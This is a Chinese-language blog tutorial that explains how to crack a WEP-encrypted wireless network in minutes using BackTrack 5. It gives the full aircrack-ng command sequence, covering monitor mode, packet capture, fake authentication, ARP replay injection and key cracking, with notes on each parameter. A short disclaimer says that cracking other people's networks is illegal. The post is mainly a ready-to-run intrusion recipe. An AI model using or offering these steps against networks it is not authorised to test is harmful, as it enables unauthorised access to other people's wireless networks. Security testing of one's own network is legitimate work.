http://mirror.switch.ch/ftp/pool/2/mirror/backtrack/ //先下載需要的版本Backtrack一直都被當作WEP密碼破解的首選系統, BackTrack 5和之前的BackTrack 3和BackTrack 4一樣集成了破解無線密碼的工具並且支持更多型號的網卡. 3分鐘破解一個用WEP加密方式的無線網絡用BackTrack 5是完全可能的.

非法破解他人的無線網絡等同犯罪, 請以自己的無線網絡作為實驗環境.
首先, 需要準備:
1.BackTrack 5 光盤版或者虛擬機鏡像, 也可以是Backtrack5 U盤版
2.一個兼容Backtrack的無線網卡
3.使用WEP加密的無線網絡加入點(指的就是你要破解的無線網絡)
點擊進入Backtrack5系統下載
需要的全部指令:
(請根據實際情況替換粗體部分)
1) ifconfig -a
(可以查看到自己機子無線網卡的MAC地址和無線網卡的設備名稱<通常為usb0或者wlan0>), 保留這個窗口方便下幾步查看需要的信息, 打開新命令窗口進入一步)
2) airmon-ng start wlan0 2
(wlan0為無線網卡, 2為需要監聽的頻道, 根據自己情況輸入, 此步驟為打開無線網卡的監聽模式)
3) airodump-ng –ivs -w name -c 2 wlan0
(獲取頻道2的所有無線AP的信息, wlan0是無線網卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入後會顯示周圍所有頻道為*的無線AP,
顯示的列表:
BSSID : 無線AP的Mac 地址
PWR: AP信號的大小
RXQ: 干擾值
Beacons:發送和接受的數據包, 有數據傳輸的時候就會跳動
#Data: 數據, 破解需要的最關鍵的就是這個
CH:頻道
MB:網絡連接速度
ESSID: AP的名稱
保留這一窗口, 打開新的命令窗口進入下一步)
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0
(發送欺騙, ap_essid為AP的名稱, 例如Linksys或者TP-Link, ap_mac為AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX為自己無線網卡的MAC地址, 第一步可以看到. 這一步成功後會顯示Successful, 如不成功需要在信號強的地方重試, 成功後才可以進入下一步)
5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0
(ap_mac為無線AP的mac地址, 具體看步驟3, XXXXXXXX為無線網卡的mac地址, wlan0為網卡, 這一步執行以後, 開始正確的收發數據包, #Data開始上漲)
6) aircrack-ng -n 64 -b ap_mac name-*.ivs
(開始破解, ap_mac為ap的mac地址, 64指的是使用了64位加密, 多次破解失敗的話可以試128)
多數情況下當#data開始迅速跳動的時候就可以開始破解了, 不需要等到多少包, 如果#data這個數據增長緩慢的話, 換個位置到無線信號強的地方再試, 命令輸入正確的話最快3分鐘搞定一個64位加密的WEP AP是沒問題的! e網軟摘測試時用的USB網卡, 如果使用內置無線網卡性能上會提升很多.

http://www.ei2u.com/wireless/wifi-secure/backtrack-5-3-fen-zhong-wep.html
http://www.path8.net/tn/archives/256
http://md11boing.pixnet.net/blog/post/5403674-backtrack-4%E7%A0%B4%E8%A7%A3wpa%E5%AF%A6%E6%88%B0

Hits: 317

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料